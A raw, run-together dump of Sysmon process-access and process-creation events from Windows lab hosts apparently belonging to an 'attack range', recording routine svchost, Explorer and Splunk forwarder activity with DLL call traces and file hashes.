11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-141B-6216-A804-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.231{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-141B-6216-A804-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:47.232{4F8D34B0-141B-6216-A804-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.093{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 